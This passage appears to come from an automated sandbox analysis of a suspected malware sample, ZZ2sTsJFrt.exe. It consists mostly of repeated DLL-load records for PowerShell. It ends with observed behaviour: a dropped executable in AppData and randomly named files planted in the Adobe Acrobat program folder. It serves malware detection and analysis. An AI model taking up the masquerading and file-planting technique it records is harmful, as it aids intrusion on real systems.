                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exeJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\dd5be8a07a6153Jump to behavior
                                    Source: ZZ2sTsJFrt.exeStatic file information: File size 2330001 > 1048576
                                    Source: ZZ2sTsJFrt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: ZZ2sTsJFrt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: ZZ2sTsJFrt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: ZZ2sTsJFrt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
